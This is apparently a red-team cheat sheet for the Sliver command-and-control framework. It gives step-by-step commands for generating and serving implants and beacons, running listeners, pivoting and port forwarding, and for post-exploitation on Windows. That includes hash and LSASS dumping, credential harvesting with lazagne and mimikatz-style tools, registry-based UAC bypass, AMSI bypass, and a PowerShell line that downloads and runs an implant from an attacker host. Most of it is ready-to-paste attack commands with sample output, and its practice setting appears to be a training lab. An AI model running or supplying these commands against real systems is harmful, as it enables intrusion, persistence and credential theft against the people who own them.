Sliver

Sliver Basics

Installation

apt-get update -y 
apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
mkdir sliver 
cd sliver
curl https://sliver.sh/install|sudo bash

Assuming /usr/local/bin/ is in your path, your sliver server should be available in the shell as sliver-server and the client as sliver.

Prepare a delivery method

On your C2 server, run systemctl start apache2 to start a web server. You can now copy the implants you generate into the folder /var/www/html and Apache will serve them. To allow any system user to put a payload their, you can run chmod -R 777 /var/www/html.

Generating the implant

Implant generation happens on the C2 server with the generate command. Connect to it and run help generate to read the extensive help page and learn about all the flags. Here is a selection of the most important flags for now:

--mtls 192.168.122.111: Specifies that the implant should connect to the Sliver server using a mutually authenticated TLS connection. Other options would be --wg for WireGuard, --http for HTTP(S) connections or --dns for DNS-based C2.
--os windows: specifies that we want to run the implant on Windows (which is the default, so we could omit this one). MacOS and Linux are also supported.
--arch amd64" specifies that we want a 64-bit implant (also the default, could be omitted). Use --arch 386 for a 32-bit one.
--format exe: specifies that we want an executable file (again the default). Other options are --format shared for dynamic libraries, --format service for a Windows service binary (can be used with the psexec command) and shellcode (only windows).
--save /var/www/html/: specifies the directory to save the binary to. I like to use the Apache web root.

sliver > generate --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html

Fix Permissions

The file /var/www/html/MEDICAL_CHANGE.exe will not be owned by the Apache system user and has very restrictive file system permissions. To make it accessible for Apache, run sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe.

Start Listener

Now start the mTLS listener on the C2 server using the mtls command. By default, it starts the listener on port 8888. You can view your listeners with the jobs command:

sliver > mtls

[*] Starting mTLS listener ...
sliver > 
[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888

Transfer Binary to Target

Execute The Binary

If all is successful you will see a new session opened

[*] Session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:36:48 CEST

Using a session

You can use your session with the use command. Just type it, hit enter, and an interactive prompt will appear that allows to select a session. Hit enter again and your prompt changes to the implant name, which was MEDICAL_CHANGE in my case. The session is now active and ready to accept your commands. With info, you can get more information about the implant:

sliver > use

? Select a session or beacon: SESSION  971c5a23  MEDICAL_CHANGE  192.168.122.160:50051  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active session MEDICAL_CHANGE (971c5a23-73e0-4418-b9c2-266484546e0d)

sliver (MEDICAL_CHANGE) > info

        Session ID: 971c5a23-73e0-4418-b9c2-266484546e0d
              Name: MEDICAL_CHANGE
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 7244
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.122.111:8888
    Remote Address: 192.168.122.160:50051
         Proxy URL: 
Reconnect Interval: 1m0s

Sliver implants supports several commands. You can get a full list with help. Features include file system exploration, file up- and downloads, port forwarding, taking screenshots and much more.

Kill Session

sessions 
sessions -k session_id

sliver > sessions

 ID         Transport   Remote Address          Hostname          Username   Operating System   Health  
========== =========== ======================= ================= ========== ================== =========
 971c5a23   mtls        192.168.122.160:50051   DESKTOP-IPQVF9T   tester     windows/amd64      [ALIVE] 

sliver > sessions -k 971c5a23


[!] Lost session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:52:53 CEST

Kill Jobs

To kill your listener

[server] sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888 

[server] sliver > jobs -k 1

[*] Killing job #1 ...
[*] Successfully killed job #1
[!] Job #1 stopped (tcp/mtls)

Generating Beaconing implant

Generating a beacon implant is very similar to session implant generation. You use the generate beacon command. Learn all about the flags with help generate beacon. Aside from all the flags discussed above, relevant beacon flags are:

--seconds 5: specify that the beacon should contact the C2 server every 5 seconds. You could alternatively use --minutes, --hours or --days.
--jitter 3: specify that an additional random delay of up to 3 seconds should be added to the 5 seconds interval.

This is how I generated the beacon:

sliver > generate beacon --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/STALE_PNEUMONIA.exe

Great Opsec ready beacon

generate beacon --seconds 1800 --jitter 300  --os linux --arch amd64 --format exe --mtls 10.10.10.10:8080 -k 10000 -t 3600 --name main --save /opt/sliver/main
generate beacon -a amd64 -c google.com -f exe -J 300 -k 3000 --mtls 10.10.10.10:8080 --name main -o linux -j 1800 --save /opt/sliver/main -S 1800 -t 3600

Rename Session / Beacon

rename --name <newname>

View Beacon Tasks

sliver > beacons

 ID         Name         Transport   Hostname       Username   Operating System   Last Check-In   Next Check-In 
========== ============ =========== ============== ========== ================== =============== ===============
 b3b9f2ee   carter_one   mtls          devel          root       linux/amd64        2m15s           57m47s

interact with use
view tasks with tasks
view output of tasks with task fetch <id>
reconfigure an implant to callback at a certain frequency
reconfig -i 1800 -j 5m -t 3600 -r 1800s

Sliver Survey

Execute the following commands in order upon session opening

info               Get info about session
getgid             Get session process GID
getpid             Get session pid
getuid             Get session process UID
whoami             Get session user execution context
ps                 List remote processes
netstat            Print network connection information
pwd                Print working directory
ls                 List current directory
screenshot         Take a screenshot
getprivs          Get current privileges (Windows only)

After this general survey, decide if you want/need (opsec) to migrate to a new process or not.

migrate           Migrate into a remote process
getprivs          Get current privileges (Windows only)

Sliver In-Depth

Generation of implants Quick Paste

# linux
generate -a amd64 --format exe --mtls 10.10.14.4:8080 --name DANTENIX01 --os linux --save /home/ubuntu/Documents/htb/dante/10.10.110.100/implants
# windows
generate -a amd64 --format exe --mtls 172.16.1.100:8443 --name DANTE-WS01 --os windows --save /home/ubuntu/Documents/htb/dante/172.16.1.13/implants

Create Listener Quick Paste

# mtls listener
mtls -L 10.10.14.2 -l 8080
# pivot listener 
pivots tcp -l 3006 --bind 172.16.1.100 -t 300

Pivots Quick Paste

# linux
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o linux -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot
# windows 
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o windows -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot

Download

Recursive Download
DANGER -> If you do not set -t <timeout in seconds> and the default timeout for command occurs then your session will die.
If you are downloading a large amount of files ensure you set a long timeout to avoid a session being killed

download -r 'C:\Users\katwamba\.ssh'

[*] Wrote 2651 bytes (3 files successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/dante-dc01_download_C_Users_katwamba_ssh_1714697939.tar.gz

Port Forward Quick Paste

portfwd add -b 60000 -r 127.0.0.1:4444

[*] Port forwarding 127.0.0.1:60000 -> 127.0.0.1:4444

view current port forwards

portfwd

 ID   Session ID                             Bind Address      Remote Address  
==== ====================================== ================= =================
  1   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:4444    127.0.0.1:4444  
  2   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:1900    127.0.0.1:1900  
  3   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:50142   127.0.0.1:50142

delete a current port forward

portfwd rm -i 2

Process Enumeration with Command Line

Use ps -c -f to see full command lines of running processes. This is critical for finding credentials passed as arguments.

# Show all processes with full command line
ps -c -f

# Filter for specific process
ps -e "firefox.exe" -c -f

Example credential discovery:

ps -c -f
# Output showing credentials in command line:
# 6624   SUPPORTDESK\Chase   C:\Program Files\Mozilla Firefox\firefox.exe : "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=

Sliver runas Command

Run a process as a different user (requires valid credentials):

# Run sliver implant as Administrator
runas -d . -u Administrator -P 'Password123!' -n -p C:\\Windows\\System32\\spool\\drivers\\color\\sliver.exe

# Flags:
# -d  Domain (use "." for local accounts)
# -u  Username
# -P  Password
# -n  NetOnly logon (network credentials only)
# -p  Path to executable

Note: runas may not give you a new session with the elevated user's token. For full impersonation, use rubeus createnetonly with migrate.

Rubeus createnetonly + Migrate

For proper credential-based impersonation in Sliver:

# 1. Create a process with target user's network credentials
rubeus -t 20 -- createnetonly /program:C:\\Windows\\System32\\notepad.exe /domain:. /username:Administrator /password:'Password123!'

# Output:
# [+] Process : 'C:\Windows\System32\notepad.exe' successfully created with LOGON_TYPE = 9
# [+] ProcessID : 5852

# 2. Migrate into the new process
migrate -p 5852

# 3. New session will be created with network access as target user

SharpUp - Automated Priv Esc Checks

GhostPack tool for finding privilege escalation paths.

sharpup audit

# Example output:
=== SharpUp: Running Privilege Escalation Checks ===
Registry AutoLogon Found

[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Registry AutoLogons ===
        DefaultDomainName: .
        DefaultUserName: Administrator
        DefaultPassword:

=== Unattended Install Files ===
        C:\Windows\Panther\Unattend.xml

What it checks:

Modifiable services/binaries
AlwaysInstallElevated
Unattended install files
Registry AutoLogon credentials
Modifiable scheduled tasks
Cached GPP passwords

PowerShell Run Process as Different User

When you have credentials but need to spawn a process as that user from a Sliver shell:

# Get into a shell first
shell -t 600

# Create credential object
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(".\Administrator", $pass)

# Download and execute (e.g., new Sliver implant)
(New-Object Net.WebClient).DownloadFile('http://ATTACKER:8000/sliver2.exe', "$env:TEMP\sliver2.exe")
Start-Process -Credential $Cred "$env:TEMP\sliver2.exe"

# New session will appear as the target user

Sliver Windows Post Exploitation

good finds

execute -t 120 -o cmd.exe /c "dir c:\*pass* /s"
execute -t 120 -o cmd.exe /c "dir c:\*password* /s"
execute -t 120 -o cmd.exe /c "dir c:\*login* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.key /s"
execute -t 120 -o cmd.exe /c "dir c:\*.ica /s"
execute -t 120 -o cmd.exe /c "dir c:\*.pwd* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.config* /s"
execute -t 120 -o cmd.exe /c "dir c:\*access* /s"

passwords in the registry

execute -o cmd.exe /c 'reg query HKCU /f password /t REG_SZ /s'

Execute-Assembly

execute-assembly -t 80 /home/ubuntu/Downloads/Autoruns64.exe -accepteula

sa-netlocalgroup

Coff-loader method of attaining local groups on a windows machines
Works on Domain Controllers as well

sa-netlocalgroup
[*] Successfully executed sa-netlocalgroup (coff-loader)
[*] Got output:
Name:      Administrators
Comment:   Administrators have complete and unrestricted access to the computer/domain
--------------------------------
Name:      Users
Comment:   Users are prevented from making accidental or intentional system-wide changes and can run most applications
--------------------------------
Name:      Guests
Comment:   Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
--------------------------------
--snip--

Hashdump

Dump hashes from sliver session

hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:3317be94bdf8da53235f825815bda05a:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::

c2tc-domaininfo

Enumerate domain information from a DC

d2tc-domaininfo
[*] Successfully executed c2tc-domaininfo (coff-loader)
[*] Got output:
--------------------------------------------------------------------
[+] DomainName:
    DANTE.local
[+] DomainGuid:
    {BF59501C-28DB-4087-A02D-E6CFA4C2575D}
[+] DnsForestName:
    DANTE.local
[+] DcSiteName:
    Default-First-Site-Name
[+] ClientSiteName:
    Default-First-Site-Name
[+] DomainControllerName (PDC):
    \\DANTE-DC01.DANTE.local
[+] DomainControllerAddress (PDC):
    \\172.16.1.20
[+] Default Domain Password Policy:
    Password history length: 24
    Maximum password age (d): 180
    Minimum password age (d): 0
    Minimum password length: 7
[+] Account Lockout Policy:
    Account lockout threshold: 0
    Account lockout duration (m): 30
    Account lockout observation window (m): 30
[+] NextDc DnsHostName:
    dante-dc01.dante.local

creds_all

dump all creds mimikatz style from a Windows machine, works on a domain controller

creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain  NTLM                              SHA1
--------     ------  ----                              ----
DANTE-DC01$  DANTE   b12ff47444ad1cc6996fd2d681a3f136  dec3493ce38fca341cc189fe2513dd797e19ca85
DANTE-DC01$  DANTE   8e387753e4e7e9901053030a0eafa53f  125870c6bbea628954c8e8767761cc1185622fe7
MediaAdmin$  DANTE   7c53bb427b222695060d8fd771743fb9  10757578eb3902bd612c306bee80bf44da1efaab
katwamba     DANTE   14a71f9de5448d83e8c63d46355837c3  61d3cacf6ad5f4571747b302a9658f7e85c5d516
xadmin       DANTE   649f65054a6672a9898cb4eb61f9684a  b57e3049b5960ed60f1baa679ab0cfd4f68b0b06
--snip--

Sharphound Sliver

sharp-hound-3 -i -s -t 120
sharp-hound-4 -i -s -t 120
[*] sharp-hound-4 output:

[*] Output saved to /tmp/sharp-hound-4_DANTE-DC01884950909.log

download 20240503015529_BloodHound.zip

[*] Wrote 10141 bytes (1 file successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/20240503015529_BloodHound.zip
rm 20240503015529_BloodHound.zip

tcpdump capture with sliver

make sure to upload a statically compiled tcpdump to match your remote targets arch

execute -o tcpdump -n -i any "not host 172.16.1.100" -w /dev/shm/out.pcap -G 600

sharpsh — PowerShell via .NET RunspaceFactory

Execute PowerShell commands through C# RunspaceFactory. Use -M for AMSI bypass and -i to run in-process:

sharpsh -M -i -- "-c whoami"

[*] sharpsh output:
nt authority\system

Shell Management

Detach from an interactive shell with CTRL+] (not CTRL+C):

PS C:\> ^]
Shell detached

List and kill shells:

shell ls

 ID   State      Session                                                 PID    PTY
==== ========== ======================================================= ====== =======
  1   detached   HUGE_MILKSHAKE (f44906cb-6562-4aef-a975-844fd782ae19)   5496   false

shell kill 1
[*] Shell 1 killed

Dump LSASS with procdump

Use procdump to dump LSASS memory, then parse offline with pypykatz:

ps -e lsass.exe

 Pid   Ppid   Executable
===== ====== ============
 664   508    lsass.exe

procdump -n lsass.exe -s /tmp/lsass.dmp -t 120
[*] Process dump stored in: /tmp/lsass.dmp

Parse the dump on your attack machine:

pypykatz lsa minidump /tmp/lsass.dmp

Stored Credentials and runas /savecred

Check for stored credentials on the target:

execute -o cmd.exe /c 'cmdkey /list'

Currently stored credentials:

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

If Domain:interactive is present, you can run a command as that user without knowing their cleartext password:

execute -o cmd.exe /c 'runas /savecred /user:SRV01\mcharles C:\Users\sadams\Desktop\sliver.exe'

[*] Session 2c6931b7 HUGE_MILKSHAKE - 10.129.21.95:49675 (SRV01) - windows/amd64

UAC Bypass via computerdefaults.exe (Non-Interactive)

From a sliver session on a user in the Administrators group but at medium integrity:

execute -o cmd.exe /c 'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "C:\Users\sadams\Desktop\sliver.exe" /f && start computerdefaults.exe'

A new elevated session will callback.

UAC Bypass via msconfig (Interactive / RDP)

From an interactive logon (RDP) as a user in the Administrators group:

Launch C:\Windows\System32\msconfig.exe — it auto-elevates
Go to Tools tab
Launch Command Prompt
You are now high-integrity and can run mimikatz/other post-exploitation tools

Sliver BOFs — Argument Separator

When passing arguments to BOFs in sliver, use -- to separate sliver flags from BOF arguments:

sa-vssenum -t 60 -- -hostname=DC01

Volume Shadow Copies via Sliver

execute -o cmd.exe /c "vssadmin CREATE SHADOW /For=C:"

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {4e29f41c-a1ee-4d6f-9f30-9fed439df3be}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

execute -o cmd.exe /c "vssadmin list shadows"

lazagne — Credential Harvesting

Upload and run lazagne to dump all credentials from the system:

upload /opt/bin/lazagne.exe
execute -t 240 -o lazagne.exe all -v

Reference: sliver-cheatsheet lazagne

Port Forwarding with Bind Address

Bind to all interfaces (0.0.0.0) to allow other tools to connect through the tunnel:

portfwd add -b 0.0.0.0:4445 -r 172.16.1.10:445

[*] Port forwarding 0.0.0.0:4445 -> 172.16.1.10:445

Important: When using netexec or other multi-threaded tools through sliver tunnels, use -t 1 to limit threads and avoid killing the tunnel:

Credential Hunting from Sliver

Search for passwords in files across the file system:

execute -o cmd.exe /c 'findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"config" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'

List files of interest recursively:

execute -o cmd.exe /c 'dir /S /B *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'

Spawn Process as Different User (Multiple Methods)

Method 1: runas via cmd.exe

runas -d DOMAIN -u USERNAME -P 'PASSWORD' -p 'C:\path\to\sliver.exe' -n

Method 2: PowerShell Start-Process

$username = "jbader"
$password = ConvertTo-SecureString "ILovePower333###" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $password)
Start-Process "C:\path\to\sliver.exe" -Credential $credential

Previousc2-frameworks NextPowershell Empire

Last updated 2 days ago

hashtagSliver Basics

hashtagInstallation

hashtagPrepare a delivery method

hashtagGenerating the implant

hashtagFix Permissions

hashtagStart Listener

hashtagTransfer Binary to Target

hashtagExecute The Binary

hashtagUsing a session

hashtagKill Session

hashtagKill Jobs

hashtagGenerating Beaconing implant

hashtagGreat Opsec ready beacon

hashtagRename Session / Beacon

hashtagView Beacon Tasks

hashtagSliver Survey

hashtagSliver In-Depth

hashtagGeneration of implants Quick Paste

hashtagCreate Listener Quick Paste

hashtagPivots Quick Paste

hashtagDownload

hashtagPort Forward Quick Paste

hashtagProcess Enumeration with Command Line

hashtagSliver runas Command

hashtagRubeus createnetonly + Migrate

hashtagSharpUp - Automated Priv Esc Checks

hashtagPowerShell Run Process as Different User

hashtagSliver Windows Post Exploitation

hashtagExecute-Assembly

hashtagsa-netlocalgroup

hashtagHashdump

hashtagc2tc-domaininfo

hashtagcreds_all

hashtagSharphound Sliver

hashtagtcpdump capture with sliver

hashtagsharpsh — PowerShell via .NET RunspaceFactory

hashtagShell Management

hashtagDump LSASS with procdump

hashtagStored Credentials and runas /savecred

hashtagUAC Bypass via computerdefaults.exe (Non-Interactive)

hashtagUAC Bypass via msconfig (Interactive / RDP)

hashtagSliver BOFs — Argument Separator

hashtagVolume Shadow Copies via Sliver

hashtaglazagne — Credential Harvesting

hashtagPort Forwarding with Bind Address

hashtagCredential Hunting from Sliver

hashtagSpawn Process as Different User (Multiple Methods)